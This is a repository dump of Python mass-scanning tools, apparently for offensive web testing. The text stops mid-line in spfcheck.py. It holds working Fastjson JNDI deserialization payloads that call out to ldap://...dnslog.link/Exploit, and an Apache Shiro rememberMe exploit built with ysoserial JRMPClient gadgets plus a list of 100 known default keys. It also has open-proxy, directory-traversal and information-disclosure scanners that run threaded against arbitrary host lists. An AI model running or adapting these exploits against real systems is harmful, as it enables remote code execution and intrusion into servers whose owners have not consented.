├── README.md ├── chexkproxy.py ├── dirvuln.py ├── fastjson_rce.py ├── fofa_favicon.py ├── infoweak.py ├── mac安装.md ├── proxy_vul.py ├── push.py ├── shiro_100key.txt ├── shiro_scan.py ├── spfcheck.py └── spider_v3.py
/README.md:
--------------------------------------------------------------------------------
1 | # scan
2 | 
3 | ## If these scripts help you, please give the repo a Star
4 | 
5 | ### [Apache Shiro deserialization batch scanner (shiro_scan)](https://github.com/Stu2014/scan/blob/master/shiro_scan.py)
6 | ```
7 | python shiro_scan.py -h
8 | usage: scan.py [optional]
9 | 
10 | Apache Shiro Scanner.By Stu.
11 | 
12 | optional arguments:
13 |   -h, --help  show this help message and exit
14 |   -f File     Put Web url in url.txt
15 |   -u Url      Put a Web url
16 |   -t THREADS  Num of scan threads,default 10
17 | 
18 | ```
19 | ### [Batch web crawler](https://github.com/Stu2014/scan/blob/master/spider_v3.py)
20 | 
21 | ```
22 | python spider_v3.py domain.txt
23 | ```
24 | ### [Batch open-proxy scanner](https://github.com/Stu2014/scan/blob/master/proxy_vul.py)
25 | 
26 | ```
27 | python proxy_vul.py domain.txt
28 | ```
29 | ### [Batch Fastjson RCE scanner](https://github.com/Stu2014/scan/blob/master/fastjson_rce.py)
30 | 
31 | ### [SPF record check](https://github.com/Stu2014/scan/blob/master/spfcheck.py)
32 | 
33 | ### [DingTalk and ServerChan push notifications](https://github.com/Stu2014/scan/blob/master/push.py)
34 | 
35 | ### [Directory traversal scanner](https://github.com/Stu2014/scan/blob/master/dirvuln.py)
36 | 
37 | 
--------------------------------------------------------------------------------
/chexkproxy.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # @Time    : 2021/3/30 10:18 AM
4 | # @Author  : Pickmea.
5 | # @Email   : h4ckst5@qq.com
6 | # @File    : chexkproxy.py
7 | 
8 | import requests
9 | import random
10 | import queue
11 | import warnings,sys
12 | from threading import Thread
13 | from urllib.parse import urlparse
14 | warnings.filterwarnings("ignore")
15 | 
16 | httpQueue = queue.Queue()
17 | 
18 | def get_url(site):
19 |     while True:
20 |         try:
21 |             hosts = httpQueue.get(timeout=0.1)
22 |         except:
23 |             break
24 |         try:
25 |             host = hosts[0]
26 |             port = hosts[1]
27 |             proxies_http = {
28 |                 "http": "http://{}:{}".format(host, port),
29 |                 "https": "http://{}:{}".format(host, port),  # the plain HTTP proxy handles both schemes
30 |             }
31 | 
32 |             # res = requests.get("http://httpbin.org/ip", proxies=proxies_http, timeout=5, verify=False).text
33 |             response = requests.get(site, proxies=proxies_http, timeout=5, verify=False).text
34 |             print("try {}{}".format(site, proxies_http))
35 |             if 'check that this domai' in response:
36 |                 print(response, '----', host)
37 |         except Exception as e:
38 |             # print(e)
39 |             pass
40 | 
41 | 
42 | def get_host_port(filename, site):
43 |     for x in open(filename,'r'):
44 |         url = x.strip().split(':')
45 |         port = url[1]
46 |         host = url[0]
47 |         # print(host,port)
48 |         httpQueue.put([host, port])
49 |     proxy_threads = []
50 |     for x in range(30):
51 |         p = Thread(target=get_url, args=(site,))
52 |         proxy_threads.append(p)
53 |         p.start()
54 | 
55 |     for p in proxy_threads:
56 |         p.join()
57 | 
58 | # prepend http:// when the scheme is missing
59 | def addhttp(x):
60 |     if x.find('http') >= 0:
61 |         pass
62 |     else:
63 |         x = 'http://' + x + '/'
64 |     return x
65 | 
66 | if __name__ == '__main__':
67 |     # filename = sys.argv[1]  # list with http:// scheme
68 |     filename = '1.txt'  # proxy list, one entry per line in the form 127.0.0.1:8080
69 |     sites = '2.txt'  # target sites to request through each proxy, e.g. baidu.com
70 |     for x in open(sites, 'r'):
71 |         site = addhttp(x.strip())
72 |         get_host_port(filename, site)
73 | 
--------------------------------------------------------------------------------
/dirvuln.py:
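dirvuln.py below flags a target when a request for a random, non-existent .js path returns 404 while a request for `/a/..;/..;/` returns 400 — the status-code pair the script treats as the signature of the `..;/` path-traversal behaviour behind a reverse proxy. As a minimal single-URL sketch of the same two-request heuristic (the function name and example target are illustrative, not part of the script):

```
import requests
import warnings
warnings.filterwarnings("ignore")

def check_travel(base_url):
    # a path that should not exist: a normally behaving server answers 404
    r1 = requests.get(base_url.rstrip('/') + '/qpalzmqpalzm.js', timeout=10, verify=False)
    # the ..;/ sequence probes how the proxy/backend pair normalises the path;
    # dirvuln.py treats the 404 + 400 combination as the vulnerable signature
    r2 = requests.get(base_url.rstrip('/') + '/a/..;/..;/', timeout=10, verify=False)
    return r1.status_code == 404 and r2.status_code == 400

if __name__ == '__main__':
    print(check_travel('https://example.com'))  # replace with a host you are authorised to test
```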
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020/8/19 下午1:55 4 | # @Author : Stu. 5 | # @Email : h4ckst5@qq.com 6 | # @des : 目录穿越扫描 7 | # @File : travelvuln_check.py 8 | import queue, requests 9 | from threading import Thread 10 | import sys 11 | import warnings 12 | warnings.filterwarnings("ignore") 13 | 14 | all_que = queue.Queue() 15 | def scan_tral(): 16 | while True: 17 | try: 18 | testurl = all_que.get(timeout=0.1) 19 | except: 20 | break 21 | # print("testing", testurl) 22 | try: 23 | res1 = requests.get(testurl+'/qpalzmqpalzm.js',timeout=10,verify=False) 24 | res2 = requests.get(testurl+'/a/..;/..;/', timeout=10,verify=False) 25 | code1 = res1.status_code 26 | code2 = res2.status_code 27 | if code1 == 404 and code2 == 400: 28 | with open("result.txt", 'a') as f: 29 | f.write("[travel vulned]"+testurl+'\n') 30 | print("travel vulned", testurl) 31 | except Exception as e: 32 | print(e) 33 | pass 34 | 35 | def start_mul(file): 36 | 37 | for x in open(file): 38 | x = x.strip() 39 | if x.find('http') >= 0: 40 | pass 41 | else: 42 | x = 'https://' + x.strip() + '/' 43 | all_que.put(x) 44 | urlth = [] 45 | for x in range(30): 46 | p = Thread(target=scan_tral) 47 | urlth.append(p) 48 | p.start() 49 | 50 | for paa in urlth: 51 | paa.join() 52 | # file = sys.argv[1] 53 | if __name__ == '__main__': 54 | filename = sys.argv[1] 55 | start_mul(filename) 56 | 57 | 58 | -------------------------------------------------------------------------------- /fastjson_rce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | """ 5 | code by: Stu. 6 | 公众号:安全黑板报 7 | """ 8 | import json 9 | import random 10 | import requests 11 | import time,Queue 12 | import argparse,sys 13 | import threading 14 | 15 | vuln_count = 0 16 | payload =['{"type":0,"pageSize":3,"pageNo":1,"a":"%s"}'] 17 | 18 | 19 | payload.append('{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://%s.dnslog.cn/Exploit","autoCommit":"true"}') 20 | payload.append('{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://%s..dnslog.link/Exploit"}}') 21 | payload.append('{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"ldap://%s..dnslog.link/Exploit","autoCommit":"true"}') 22 | payload.append('{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'+'"dataSourceName":"ldap://%s..dnslog.link/Exploit","autoCommit":"true"}}') 23 | 24 | 25 | 26 | def checkvuln(): 27 | global vuln_count 28 | while True: 29 | try: 30 | web_url = queue.get(timeout=0.1) 31 | except: 32 | break 33 | try: 34 | for x in range(len(payload)): 35 | random_str_ = random_str(8) 36 | data = payload[x] % random_str_ 37 | res = requests.post(url=web_url,data=data,timeout=1.5) 38 | result = getdnslog(random_str_) 39 | if result == "True": 40 | print "[+200] vuln fastjson rce",web_url,"\n payload:",data 41 | vuln_count+=1 42 | break 43 | else: 44 | pass 45 | except Exception,e: 46 | result = getdnslog(random_str_) 47 | if result == "True": 48 | print "[+200] vuln fastjson rce",web_url,"\n payload:",data 49 | vuln_count+=1 50 | break 51 | else: 52 | pass 53 | 54 | #查看dnslog状态 55 | def getdnslog(random_str): 56 | dns_check = "https://admin.dnslog.link/api/dns//%s/" % random_str#token 替换为http://admin.dnslog.link平台字符串 57 | res = requests.get(dns_check) 58 | return 
res.text.strip()
59 | 
60 | # generate a random alphanumeric string
61 | def random_str(len):
62 |     str1 = ""
63 |     for i in range(len):
64 |         str1 += (random.choice("QWERTYUIOPASDFGHJKLZXCVBNM1234567890"))
65 |     return str(str1)
66 | 
67 | 
68 | if __name__ == "__main__":
69 |     parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,
70 |                                      description="Fastjson Rce.By Stu.",
71 |                                      usage="scan.py [optional]")
72 |     parser.add_argument("-f",metavar="File",type=str,default="url.txt",help="Put Web url in url.txt")
73 |     parser.add_argument("-u",metavar="Url",type=str,help="Put a Web url")
74 |     parser.add_argument("-t",metavar="THREADS",type=int,default="10",help="Num of scan threads,default 10")
75 | 
76 |     if len(sys.argv)==1:
77 |         sys.argv.append("-h")
78 |     args = parser.parse_args()
79 |     start_time = time.time()
80 |     if args.u is None:
81 |         # put the target URLs into the queue
82 |         queue = Queue.Queue()
83 |         for web_url in open(args.f).xreadlines():
84 |             web_url = web_url.strip()
85 |             if web_url.find("http") >= 0:
86 |                 pass
87 |             else:
88 |                 web_url = "http://"+web_url
89 |             if not web_url:
90 |                 continue
91 |             queue.put(web_url)
92 | 
93 |         # start the scanning threads
94 |         threads = []
95 |         for i in range(args.t):
96 |             t = threading.Thread(target=checkvuln)
97 |             threads.append(t)
98 |             t.start()
99 | 
100 |         for t in threads:
101 |             t.join()
102 |     else:
103 |         queue = Queue.Queue()
104 |         web_url = (args.u).strip()
105 |         if web_url.find("http") >= 0:
106 |             pass
107 |         else:
108 |             web_url = "http://"+web_url
109 |         queue.put(web_url)
110 |         checkvuln()
111 |     print ("[+]Done. %s vulnerable found in %.1f seconds." % (vuln_count,time.time() - start_time))
112 | 
113 | 
--------------------------------------------------------------------------------
/fofa_favicon.py:
--------------------------------------------------------------------------------
1 | import mmh3
2 | import requests
3 | 
4 | response = requests.get('http://baidu.com/favicon.ico')
5 | favicon = response.content.encode('base64')
6 | favicon_hash = mmh3.hash(favicon)
7 | print favicon_hash
8 | '''
9 | http.favicon.hash:11111
10 | '''
11 | 
--------------------------------------------------------------------------------
/infoweak.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # @Time    : 2021/1/25 4:36 PM
4 | # @Author  : Pickmea.
5 | # @Email   : h4ckst5@qq.com
6 | # @File    : infoweak.py
7 | 
8 | # information disclosure scan
9 | import queue, sys
10 | from urllib.parse import urlparse
11 | from threading import Thread
12 | import HackRequests
13 | import warnings
14 | warnings.filterwarnings("ignore")
15 | 
16 | all_que = queue.Queue()
17 | hack = HackRequests.hackRequests()
18 | 
19 | def scan_tral():
20 |     while True:
21 |         try:
22 |             testurl = all_que.get(timeout=0.1).strip('\r').strip('\n')
23 |         except:
24 |             break
25 |         try:
26 |             if testurl.endswith('/'):
27 |                 pass
28 |             else:
29 |                 testurl += '/'
30 |             xx = urlparse(testurl).netloc
31 |             # print(host)
32 |             raw = '''
33 | GET / HTTP/1.1
34 | Host: {}
35 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0
36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
37 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
38 | Accept-Encoding: gzip, deflate
39 | Connection: close
40 | Referer: {}
41 | ''' .format(xx, testurl)
42 |             # print(raw)
43 |             hh = hack.httpraw(raw)
44 |             res = (hh.log['response'])
45 |             # if hh.status_code != 302 and hh.status_code != 404 and hh.status_code != 200 and hh.status_code != 301:
46 |             #     print("code error: ", testurl, "\n", hh.log, "\n", hh.status_code)
47 |             if res.find('Illegal character') >= 0:
48 |                 print("[vuln:]",testurl)
49 |         except Exception as e:
50 |             # print(e)
51 |             pass
52 | 
53 | def start_mul(file):
54 |     for x in open(file):
55 |         x = x.strip()
56 |         if x.find('http') >= 0:
57 |             pass
58 |         else:
59 |             x = 'https://' + x.strip() + '/'
60 |         all_que.put(x)
61 |     urlth = []
62 |     for x in range(30):
63 |         p = Thread(target=scan_tral)
64 |         urlth.append(p)
65 |         p.start()
66 | 
67 |     for paa in urlth:
68 |         paa.join()
69 | # file = sys.argv[1]
70 | if __name__ == '__main__':
71 |     filename = sys.argv[1]
72 |     # filename = 'http_url.txt'
73 |     start_mul(filename)
74 | 
--------------------------------------------------------------------------------
/mac安装.md:
--------------------------------------------------------------------------------
1 | macOS setup
2 | ```
3 | https://github.com/yanxiu0614/subdomain3.git
4 | burp
5 | sqlmap
6 | nmap
7 | 
8 | 
9 | WeChat
10 | google chrome
11 | DingTalk
12 | xnip
13 | shuttle
14 | telegram desktop
15 | the unarchiver
16 | tencent lemon lite
17 | openinterminal lite
18 | sublime text 3
19 | Install the rdm GUI tool: https://pan.baidu.com/s/10vpdhw7YfDD7G4yZCGtqQg
20 | ```
21 | 
--------------------------------------------------------------------------------
/proxy_vul.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # @Time    : 2020/9/16 4:48 PM
4 | # @Author  : Stu.
5 | # @Email : h4ckst5@qq.com 6 | # @File : http_proxy_vuln.py 7 | # 扫描代理模块 8 | 9 | import requests 10 | import random 11 | import queue 12 | import warnings,sys 13 | from threading import Thread 14 | from urllib.parse import urlparse 15 | warnings.filterwarnings("ignore") 16 | 17 | httpQueue = queue.Queue() 18 | 19 | def get_url(): 20 | while True: 21 | try: 22 | hosts = httpQueue.get(timeout=0.1) 23 | except: 24 | break 25 | host = hosts[0] 26 | port = hosts[1] or 80 27 | proxies_http = { 28 | "http": "http://{}:{}".format(host, port), 29 | "https": "https://{}:{}".format(host, port), 30 | } 31 | # print(host+str(port)+'\n') 32 | random_str_ = random_str(8) 33 | try: 34 | response = requests.get("https://"+str(host)+'.'+str(port)+'.'+random_str_+".f4c8e390.dnslog.link/", proxies=proxies_http, timeout=5, verify=False) 35 | if getdnslog(random_str_) == "True": 36 | print("[200] {}:{} {}".format(host, port, random_str_)) 37 | with open("result.txt", 'a') as f: 38 | f.write("[http-proxy]"+host+':'+str(port)+' '+random_str_+'\n') 39 | except Exception as e: 40 | print(e) 41 | pass 42 | 43 | # 查看dnslog状态 44 | def getdnslog(random_str): 45 | dns_check = "https://admin.dnslog.link/api/web/f4c8e390/%s/" % random_str # token 替换为http://admin.dnslog.link平台字符串 46 | res = requests.get(dns_check, timeout=5, verify=False) 47 | return res.text.strip() 48 | 49 | # 取得随机数 50 | def random_str(len): 51 | str1 = "" 52 | for i in range(len): 53 | str1 += (random.choice("QWERTYUIOPASDFGHJKLZXCVBNM1234567890")) 54 | return str(str1) 55 | 56 | def get_host_port(filename): 57 | for x in open(filename,'r'): 58 | url = x.strip() 59 | port = urlparse(url).port 60 | host = urlparse(url).hostname 61 | httpQueue.put([host, port]) 62 | proxy_threads = [] 63 | for x in range(30): 64 | p = Thread(target=get_url) 65 | proxy_threads.append(p) 66 | p.start() 67 | 68 | for p in proxy_threads: 69 | p.join() 70 | if __name__ == '__main__': 71 | filename = sys.argv[1]#存在http协议 72 | get_host_port(filename) 73 | 74 | -------------------------------------------------------------------------------- /push.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020/6/27 下午3:33 4 | # @Author : Stu. 
5 | # @File : push.py 6 | import json 7 | import requests 8 | 9 | 10 | # 钉钉推送,token添加关键字,扫描、vuln 11 | def push_dingding(dingtoken, jobstatus=None, vul_type=None, job_url=None, vuln_url=None, test=None): 12 | if dingtoken: 13 | headers = {"Content-Type": "application/json"} 14 | dingtoken_url = "https://oapi.dingtalk.com/robot/send?access_token=" + dingtoken; 15 | 16 | if test == 1: 17 | ding_json = { 18 | "msgtype": "text", 19 | "text": { 20 | "content": "测试扫描器推送token可用" 21 | } 22 | } 23 | elif jobstatus == 1 and job_url: 24 | ding_json = { 25 | "msgtype": "text", 26 | "text": { 27 | "content": "%s 域名端口扫描任务完成 ,请及时查看" % job_url 28 | } 29 | } 30 | elif vuln_url and vul_type: 31 | ding_json = { 32 | "msgtype": "text", 33 | "text": { 34 | "content": "[vuln find] vuln type: %s ,vuln url: %s" % (vul_type, vuln_url) 35 | } 36 | } 37 | try: 38 | res = requests.post(url=dingtoken_url, data=json.dumps(ding_json), headers=headers) 39 | except Exception as e: 40 | print("钉钉推送错误:", e) 41 | pass 42 | else: 43 | pass 44 | 45 | 46 | # 微信server酱推送 访问http://sc.ftqq.com/3.version获取secret 47 | def push_wx(secret, jobstatus=None, vul_type=None, job_url=None, vuln_url=None, test=None): 48 | if secret: 49 | wx_url = "http://sc.ftqq.com/" + secret + ".send";print(wx_url) 50 | 51 | if test == 1: 52 | wx_json = { 53 | "text": "扫描器测试微信推送", 54 | "desp": "扫描器测试微信推送正文" 55 | } 56 | elif jobstatus == 1 and job_url: 57 | wx_json = { 58 | "text": "扫描任务完成", 59 | "desp": "%s 域名端口扫描任务完成 ,请及时查看" % job_url 60 | } 61 | elif vuln_url and vul_type: 62 | wx_json = { 63 | "text": "漏洞报告", 64 | "desp": "[vuln find] vuln type: %s ,vuln url: %s" % (vul_type, vuln_url) 65 | } 66 | try: 67 | res = requests.post(url=wx_url, data=wx_json) 68 | print(res.text) 69 | except Exception as e: 70 | print("微信推送错误:", e) 71 | pass 72 | else: 73 | pass 74 | 75 | 76 | if __name__ == '__main__': 77 | dingtoken = "" 78 | secret = "" 79 | # 钉钉推送,token添加关键字,扫描、vuln 80 | # 测试是否可用 传入token,test=1 81 | push_dingding(dingtoken, test=1) 82 | 83 | # 扫描任务完成 传入dingtoken,jobstatus,job_url 84 | push_dingding(dingtoken=dingtoken, jobstatus=1, job_url="http://baidu.com") 85 | 86 | # 扫描发现漏洞,传入dingtoken,vul_type,vuln_url 87 | push_dingding(dingtoken, vul_type="sqlinjection", vuln_url="http://baidu.com") 88 | 89 | # 微信推送 90 | push_wx(secret=secret, test=1) 91 | push_wx(secret=secret, jobstatus=1, job_url="http://baidu.com") 92 | push_wx(secret=secret, vul_type="sqlinjection", vuln_url="http://baidu.com") 93 | -------------------------------------------------------------------------------- /shiro_100key.txt: -------------------------------------------------------------------------------- 1 | kPH+bIxk5D2deZiIxcaaaA== 2 | 4AvVhmFLUs0KTA3Kprsdag== 3 | Z3VucwAAAAAAAAAAAAAAAA== 4 | fCq+/xW488hMTCD+cmJ3aQ== 5 | 0AvVhmFLUs0KTA3Kprsdag== 6 | 1AvVhdsgUs0FSA3SDFAdag== 7 | 1QWLxg+NYmxraMoxAXu/Iw== 8 | 25BsmdYwjnfcWmnhAciDDg== 9 | 2AvVhdsgUs0FSA3SDFAdag== 10 | 3AvVhmFLUs0KTA3Kprsdag== 11 | 3JvYhmBLUs0ETA5Kprsdag== 12 | r0e3c16IdVkouZgk1TKVMg== 13 | 5aaC5qKm5oqA5pyvAAAAAA== 14 | 5AvVhmFLUs0KTA3Kprsdag== 15 | 6AvVhmFLUs0KTA3Kprsdag== 16 | 6NfXkC7YVCV5DASIrEm1Rg== 17 | 6ZmI6I2j5Y+R5aSn5ZOlAA== 18 | cmVtZW1iZXJNZQAAAAAAAA== 19 | 7AvVhmFLUs0KTA3Kprsdag== 20 | 8AvVhmFLUs0KTA3Kprsdag== 21 | 8BvVhmFLUs0KTA3Kprsdag== 22 | 9AvVhmFLUs0KTA3Kprsdag== 23 | OUHYQzxQ/W9e/UjiAGu6rg== 24 | a3dvbmcAAAAAAAAAAAAAAA== 25 | aU1pcmFjbGVpTWlyYWNsZQ== 26 | bWljcm9zAAAAAAAAAAAAAA== 27 | bWluZS1hc3NldC1rZXk6QQ== 28 | bXRvbnMAAAAAAAAAAAAAAA== 29 | ZUdsaGJuSmxibVI2ZHc9PQ== 30 | wGiHplamyXlVB11UXWol8g== 31 | 
U3ByaW5nQmxhZGUAAAAAAA== 32 | MTIzNDU2Nzg5MGFiY2RlZg== 33 | L7RioUULEFhRyxM7a2R/Yg== 34 | a2VlcE9uR29pbmdBbmRGaQ== 35 | WcfHGU25gNnTxTlmJMeSpw== 36 | OY//C4rhfwNxCQAQCrQQ1Q== 37 | 5J7bIJIV0LQSN3c9LPitBQ== 38 | f/SY5TIve5WWzT4aQlABJA== 39 | bya2HkYo57u6fWh5theAWw== 40 | WuB+y2gcHRnY2Lg9+Aqmqg== 41 | kPv59vyqzj00x11LXJZTjJ2UHW48jzHN 42 | 3qDVdLawoIr1xFd6ietnwg== 43 | ZWvohmPdUsAWT3=KpPqda 44 | YI1+nBV//m7ELrIyDHm6DQ== 45 | 6Zm+6I2j5Y+R5aS+5ZOlAA== 46 | 2A2V+RFLUs+eTA3Kpr+dag== 47 | 6ZmI6I2j3Y+R1aSn5BOlAA== 48 | SkZpbmFsQmxhZGUAAAAAAA== 49 | 2cVtiE83c4lIrELJwKGJUw== 50 | fsHspZw/92PrS3XrPW+vxw== 51 | XTx6CKLo/SdSgub+OPHSrw== 52 | sHdIjUN6tzhl8xZMG3ULCQ== 53 | O4pdf+7e+mZe8NyxMTPJmQ== 54 | HWrBltGvEZc14h9VpMvZWw== 55 | rPNqM6uKFCyaL10AK51UkQ== 56 | Y1JxNSPXVwMkyvES/kJGeQ== 57 | lT2UvDUmQwewm6mMoiw4Ig== 58 | MPdCMZ9urzEA50JDlDYYDg== 59 | xVmmoltfpb8tTceuT5R7Bw== 60 | c+3hFGPjbgzGdrC+MHgoRQ== 61 | ClLk69oNcA3m+s0jIMIkpg== 62 | Bf7MfkNR0axGGptozrebag== 63 | 1tC/xrDYs8ey+sa3emtiYw== 64 | ZmFsYWRvLnh5ei5zaGlybw== 65 | cGhyYWNrY3RmREUhfiMkZA== 66 | IduElDUpDDXE677ZkhhKnQ== 67 | yeAAo1E8BOeAYfBlm4NG9Q== 68 | cGljYXMAAAAAAAAAAAAAAA== 69 | 2itfW92XazYRi5ltW0M2yA== 70 | XgGkgqGqYrix9lI6vxcrRw== 71 | ertVhmFLUs0KTA3Kprsdag== 72 | 5AvVhmFLUS0ATA4Kprsdag== 73 | s0KTA3mFLUprK4AvVhsdag== 74 | hBlzKg78ajaZuTE0VLzDDg== 75 | 9FvVhtFLUs0KnA3Kprsdyg== 76 | d2ViUmVtZW1iZXJNZUtleQ== 77 | yNeUgSzL/CfiWw1GALg6Ag== 78 | NGk/3cQ6F5/UNPRh8LpMIg== 79 | 4BvVhmFLUs0KTA3Kprsdag== 80 | MzVeSkYyWTI2OFVLZjRzZg== 81 | CrownKey==a12d/dakdad 82 | empodDEyMwAAAAAAAAAAAA== 83 | A7UzJgh1+EWj5oBFi+mSgw== 84 | YTM0NZomIzI2OTsmIzM0NTueYQ== 85 | c2hpcm9fYmF0aXMzMgAAAA== 86 | i45FVt72K2kLgvFrJtoZRw== 87 | U3BAbW5nQmxhZGUAAAAAAA== 88 | ZnJlc2h6Y24xMjM0NTY3OA== 89 | Jt3C93kMR9D5e8QzwfsiMw== 90 | MTIzNDU2NzgxMjM0NTY3OA== 91 | vXP33AonIp9bFwGl7aT7rA== 92 | V2hhdCBUaGUgSGVsbAAAAA== 93 | Z3h6eWd4enklMjElMjElMjE= 94 | Q01TX0JGTFlLRVlfMjAxOQ== 95 | ZAvph3dsQs0FSL3SDFAdag== 96 | Is9zJ3pzNh2cgTHB4ua3+Q== 97 | NsZXjXVklWPZwOfkvk6kUA== 98 | GAevYnznvgNCURavBhCr1w== 99 | 66v1O8keKNV3TTcGPK1wzg== 100 | SDKOLKn2J1j/2BHjeZwAoQ== -------------------------------------------------------------------------------- /shiro_scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | ''' 5 | code by: Stu. 
6 | 公众号:安全黑板报 7 | ''' 8 | 9 | import os 10 | import re 11 | import base64 12 | import uuid,time 13 | import subprocess 14 | import requests,sys 15 | from Crypto.Cipher import AES 16 | import random,argparse,Queue,threading 17 | import warnings 18 | 19 | 20 | warnings.filterwarnings("ignore") 21 | JAR_FILE = './ysoserial-0.0.6-SNAPSHOT-all.jar' 22 | scan_count = 0 23 | vuln_count = 0 24 | 25 | def poc(url, rce_command,key_): 26 | if '://' not in url: 27 | target = 'https://%s' % url if ':443' in url else 'http://%s' % url 28 | else: 29 | target = url 30 | try: 31 | payload = generator(rce_command, JAR_FILE,key_) # 生成payload 32 | r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10,verify=False) # 发送验证请求 33 | # print r.text 34 | except Exception, e: 35 | return True 36 | return True 37 | 38 | 39 | def generator(command, fp,key_): 40 | if not os.path.exists(fp): 41 | raise Exception('jar file not found!') 42 | popen = subprocess.Popen(['java', '-jar', fp, 'JRMPClient', command], 43 | stdout=subprocess.PIPE) 44 | BS = AES.block_size 45 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 46 | mode = AES.MODE_CBC 47 | iv = uuid.uuid4().bytes 48 | encryptor = AES.new(base64.b64decode(key_), mode, iv) 49 | file_body = pad(popen.stdout.read()) 50 | base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) 51 | return base64_ciphertext 52 | 53 | #取得随机数 54 | def random_str(len): 55 | str1 = "" 56 | for i in range(len): 57 | str1 += (random.choice("QWERTYUIOPASDFGHJKLZXCVBNM1234567890")) 58 | return str(str1) 59 | 60 | #查看dnslog状态 61 | def getdnslog(random_str): 62 | dns_check = 'https://admin.dnslog.link/api/dns/token/%s/' % random_str#token 替换为http://admin.dnslog.link平台字符串 63 | res = requests.get(dns_check) 64 | return res.text.strip() 65 | 66 | #检查是否执行dnslog成功 67 | def check_vuln(): 68 | key = { 69 | 'kPH+bIxk5D2deZiIxcaaaA==', 70 | 'wGiHplamyXlVB11UXWol8g==', 71 | '2AvVhdsgUs0FSA3SDFAdag==', 72 | '4AvVhmFLUs0KTA3Kprsdag==', 73 | 'fCq+/xW488hMTCD+cmJ3aQ==', 74 | '3AvVhmFLUs0KTA3Kprsdag==', 75 | '1QWLxg+NYmxraMoxAXu/Iw==', 76 | 'ZUdsaGJuSmxibVI2ZHc9PQ==', 77 | 'Z3VucwAAAAAAAAAAAAAAAA==', 78 | 'U3ByaW5nQmxhZGUAAAAAAA==', 79 | 'wGiHplamyXlVB11UXWol8g==', 80 | '6ZmI6I2j5Y+R5aSn5ZOlAA==' 81 | } 82 | global scan_count,vuln_count 83 | while True: 84 | try : 85 | web_url = queue.get(timeout=0.1) 86 | scan_count+=1 87 | except: 88 | break 89 | try: 90 | 91 | for key_ in key: 92 | random_str_ = random_str(8) 93 | connect = poc(web_url,random_str_+".token.dnslog.link",key_)#token 替换为http://admin.dnslog.link平台字符串 94 | if connect == False: 95 | break 96 | result = getdnslog(random_str_) 97 | # print result,random_str_,key_ 98 | if result == 'True': 99 | print "[+200] vuln apache shiro",web_url,key_ 100 | vuln_count+=1 101 | break 102 | else: 103 | pass 104 | except Exception,e: 105 | pass 106 | 107 | if __name__ == '__main__': 108 | parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, 109 | description='Apache Shiro Scanner.By Stu.', 110 | usage='scan.py [optional]') 111 | parser.add_argument('-f',metavar='File',type=str,default='url.txt',help='Put Web url in url.txt') 112 | parser.add_argument('-u',metavar='Url',type=str,help='Put a Web url') 113 | parser.add_argument('-t',metavar='THREADS',type=int,default='10',help='Num of scan threads,default 10') 114 | 115 | if len(sys.argv)==1: 116 | sys.argv.append('-h') 117 | args = parser.parse_args() 118 | start_time = time.time() 119 | if args.u is None: 120 | #将url放入队列 121 | 
queue = Queue.Queue() 122 | for web_url in open(args.f).xreadlines(): 123 | web_url = web_url.strip() 124 | if not web_url: 125 | continue 126 | queue.put(web_url) 127 | 128 | #开启多线程访问 129 | threads = [] 130 | for i in range(args.t): 131 | t = threading.Thread(target=check_vuln) 132 | threads.append(t) 133 | t.start() 134 | 135 | for t in threads: 136 | t.join() 137 | else: 138 | queue = Queue.Queue() 139 | queue.put(args.u) 140 | check_vuln() 141 | print ('[+]Done. %s weburl scanned %s available %.1f seconds.' % (scan_count,vuln_count,time.time() - start_time)) 142 | 143 | -------------------------------------------------------------------------------- /spfcheck.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import dns.resolver 3 | import requests,json,sys 4 | import argparse 5 | 6 | vuldomain="" 7 | #token 配置关键字spf 8 | tokenurl="https://oapi.dingtalk.com/robot/send?access_token=" 9 | headers ={"Content-Type": "application/json"} 10 | 11 | #检测是否配置spf 12 | def check_vul(url): 13 | global vuldomain 14 | try: 15 | A = str(dns.resolver.query(url,"txt").response) 16 | if A.find("v=spf") >= 0: 17 | pass 18 | else: 19 | vuldomain+=url+"\n" 20 | # print(vuldomain) 21 | return True 22 | except dns.resolver.NoAnswer: 23 | vuldomain+=url+"\n" 24 | return True 25 | except dns.exception.Timeout: 26 | return False 27 | except: 28 | return False 29 | 30 | 31 | #提醒 32 | def sendresult(vuldomain): 33 | # vuldomain 34 | ding={ 35 | "msgtype": "text", 36 | "text": { 37 | "content": "以下spf未配置,请检查!\n%s" % vuldomain 38 | } 39 | } 40 | try: 41 | res=requests.post(url=tokenurl,data=json.dumps(ding),headers=headers) 42 | except: 43 | pass 44 | 45 | 46 | if __name__ == '__main__': 47 | parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, 48 | description='SPF NOT SET Scanner.By Stu.', 49 | usage='spfcheck.py [optional]') 50 | parser.add_argument('-f',metavar='File',type=str,default='url.txt',help='Put Web 